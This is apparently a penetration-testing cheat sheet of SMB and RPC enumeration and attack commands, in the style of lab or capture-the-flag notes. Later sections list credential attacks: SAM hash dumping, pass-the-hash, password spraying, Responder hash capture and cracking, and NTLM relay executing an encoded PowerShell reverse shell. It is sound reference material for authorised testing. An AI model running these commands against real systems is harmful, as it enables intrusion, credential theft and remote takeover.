SMB, RPC - 137,138,139,445,111

SMBclient

# Connect with a null session (anonymous access) and list the available shares
smbclient -N -L //ip

# Log in with no username/password and get a prompt for further enumeration
smbclient //ip/notes

# Log in with a valid username and password
smbclient -U 'user%pass' //ip/new-site

# Downloading a file 
get filename

# Run local system commands from the smbclient prompt using !<cmd>
!ls
!cat something

# Check current connections to the Samba server
smbstatus

Nmap SMB scripts

# Nmap scanning for smb 
nmap ip -sV -sC -p139,445

# Nmap vulnerability scan (smb-vuln-* scripts)
nmap -p445 --script smb-vuln-* <target>  

RPCclient

# nmap script scan
nmap -sV -p 111 --script=rpcinfo $RHOST

# If you find NFS-related services, enumerate those.
nmap -p 111 --script nfs* $RHOST

# Connect to the server over RPC with an empty username
rpcclient -U "" ip
  • Some commands to get information:

----------------------- RPCclient Enumeration -------------------------

# Server information
srvinfo	

# Enumerate all domains that are deployed in the network.
enumdomains

# Provides domain, server, and user information of deployed domains
querydominfo

# Enumerates all available shares.
netshareenumall

# Provides information about a specific share.
netsharetargetinfo <share>

----------------------- RPCclient User Enumeration ------------------------

# Enumerates all domain users.
enumdomusers

# Provides information about a specific user.
queryuser <RID>

----------------------- RPCclient Group Enumeration -----------------------
# Enumerates all domain groups.
enumdomgroups

# Provides information about the group with the given RID
querygroup 0x201

# Enumerates the members of a group by RID
querygroupmem 0x200

SMBmap

# Link : <https://github.com/ShawnDEvans/smbmap>

smbmap -H ip
smbmap -H ip -u eren
smbmap -R directory -H ip
smbmap -R directory -H ip -A Groups.xml -q
smbmap -d active.htb -u user -p password -H ip -R Users

smbmap -H ip --download "notes\\note.txt"
smbmap -H ip --upload test.txt "notes\\test.txt"

CrackMapExec

# Link : <https://github.com/Porchetta-Industries/CrackMapExec>

crackmapexec smb ip --shares -u '' -p ''

# To execute commands remotely 
crackmapexec smb ip -u Administrator -p 'Password123!' -x 'whoami' --exec-method smbexec

# Enumerating Logged-on Users
crackmapexec smb 10.10.10.0/24 -u administrator -p 'Password123!' --loggedon-users

# Extract Hashes from SAM Database
crackmapexec smb ip -u administrator -p 'Password123!' --sam

# Pass-the-Hash (PtH)
crackmapexec smb 10.10.110.17 -u Administrator -H 2B576ACBE6BCFDA7294D6BD18041B8FE

# Password spraying
crackmapexec smb ip -u /tmp/userlist.txt -p 'Company01!' --continue-on-success

Enum4linux-ng

# Link : <https://github.com/cddmp/enum4linux-ng>

# Installation
git clone https://github.com/cddmp/enum4linux-ng.git
cd enum4linux-ng
pip3 install -r requirements.txt

# Enumeration
./enum4linux-ng.py ip -A
./enum4linux-ng.py ip -A -C

PsExec

# To connect to a remote machine with a local administrator account
impacket-psexec administrator:'Password123!'@ip

Responder

# Creates a fake SMB server using Responder's default configuration
responder -I <interface name>
sudo responder -I ens33

# NetNTLMv2 - crack the captured hash with hashcat (mode 5600)
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt

Can't crack the hash?

# impacket-ntlmrelayx
# Relays the captured authentication to the target and dumps its SAM database
impacket-ntlmrelayx --no-http-server -smb2support -t ip

# Relay the hash and execute a command, e.g. the base64-encoded reverse shell below
impacket-ntlmrelayx --no-http-server -smb2support -t ip -c 'powershell -e JABj----kA'

# CrackMapExec
# PassTheHash
crackmapexec smb 10.10.110.17 -u Administrator -H 2B576ACBE6BCFDA7294D6BD18041B8FE

Brute Forcing User RIDs

# Using a shell one-liner
for i in $(seq 500 1100);do rpcclient -N -U "" ip -c "queryuser 0x$(printf '%x\\n' $i)" | grep "User Name\\|user_rid\\|group_rid" && echo "";done

# Python script from Impacket - samrdump.py
samrdump.py ip
